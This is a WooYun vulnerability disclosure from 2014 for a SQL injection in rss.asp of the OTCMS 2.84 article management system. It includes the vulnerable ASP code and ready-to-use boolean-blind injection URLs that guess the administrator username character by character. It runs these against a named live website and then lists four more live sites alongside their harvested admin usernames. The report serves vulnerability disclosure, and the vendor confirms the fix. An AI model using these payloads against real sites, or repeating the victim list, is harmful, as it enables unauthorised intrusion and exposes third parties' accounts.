当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-069130

漏洞标题:网钛文章管理系统(OTCMS)2.84 SQL注射漏洞

相关厂商:otcms.com

漏洞作者: 语邑尘

提交时间:2014-07-21 18:52

修复时间:2014-09-04 18:54

公开时间:2014-09-04 18:54

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-21: 细节已通知厂商并且等待厂商处理中
2014-07-21: 厂商已经确认,细节仅向厂商公开
2014-07-31: 细节向核心白帽子及相关领域专家公开
2014-08-10: 细节向普通白帽子公开
2014-08-20: 细节向实习白帽子公开
2014-09-04: 细节向公众公开

简要描述:

网钛文章管理系统(OTCMS)2.84 存在SQL注射漏洞。

详细说明:

网钛文章管理系统(OTCMS)2.84 的 rss.asp 存在注入漏洞。可获取管理员及密码。因密码经过两次CMD5加密,危害较小。
问题代码:

typeStr	= Trim(request.querystring("typeStr"))
maxNum = Trim(request.querystring("maxNum"))
typeWhereStr = ""
typeTitle = ""
If typeStr="announ" Then
typeTitle = SYS_homeAnnounName & SYS_titleSign
typeWhereStr = " and IF_type1ID=-1"
ElseIf InStr(typeStr,",")>0 Then
typeArr = Split(typeStr,",")
typeUbound=UBound(typeArr)
If typeUbound>=2 Then
typeRank = 1
typeRankID = typeArr(1)
If typeUbound>=3 Then
typeRank = 2
typeRankID = typeArr(2)
If typeUbound>=4 Then
typeRank = 3
typeRankID = typeArr(3)
End If
End If
Set typeexe=conobj.execute("select IT_theme from OT_infoType where IT_ID="& typeRankID)
If Not typeexe.EOF Then
typeTitle = typeexe("IT_theme") & SYS_titleSign
typeWhereStr = " and IF_type"& typeRank &"ID="& typeRankID
End If
typeexe.close
Set typeexe=Nothing


此文件没有包含通过防注入系统,变量typeStr 获取后经过逗号分割后进入数据库查询,所以只要构造一个特殊的语句让逗号分割后形成注入语句即可。
特殊语句示例:

rss.asp?typeStr=1234,11 and (select count(*) from OT_member where MB_ID=1 and MB_username like 'w____')>0,888


语句经过分割后

11 and (select count(*) from OT_member where MB_ID=1 and MB_username like 'w____')>0


会被代入数据库查询。注入漏洞形成。 因此变量是用逗号分割的,所以注入语句不能有逗号, 要用like 如猜到是5位 则猜a____,b____ 直到返回正确的结果。 另外11这个数值并不是固定的,我的方法是从11试到50,哪个返回的字节数最少就用哪个猜,容易判断。

漏洞证明:

关键字 dynWeb.asp?dataID=
网站1:http://www.hx-x.com/ 手工注入累死人,我只给出正确的结果,乌云可以自己去验证。管理员用户名为:wwwhxx 密码就不猜了 ,猜了也没用。
注入语句:

http://www.hx-x.com/rss.asp?typeStr=1234,11 and (select count(*) from OT_member where MB_ID=1 and MB_username like 'wwwhxx')>0,888


截图为

火狐截图_2014-07-20T12-46-28.743Z.png


如果将 wwwhxx 换成别的字符 如

http://www.hx-x.com/rss.asp?typeStr=1234,11 and (select count(*) from OT_member where MB_ID=1 and MB_username like 'abcdefg')>0,888


火狐截图_2014-07-20T12-50-53.905Z.png


这两次返回的结果是不一样的。
这样的网站有很多

http://www.tao3.org/ 管理员为:admin
http://www.clguoji.com/ 管理员为:zx458260889
http://www.hflwzx.com/ 管理员为:qkdhw
http://www.e-home-68.com 管理员:wuhua

修复方案:

对分割后的字段进行验证即可。

版权声明:转载请注明来源 语邑尘@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-07-21 23:34

厂商回复:

很感谢 路人甲 反馈网钛OTCMS系统漏洞,经检查确实存在该漏洞。

最新状态:

2014-08-16:该漏洞已于网钛CMS V5.00版本修复了。

2014-09-11:网钛CMS免费版已于 V2.85版本修复了。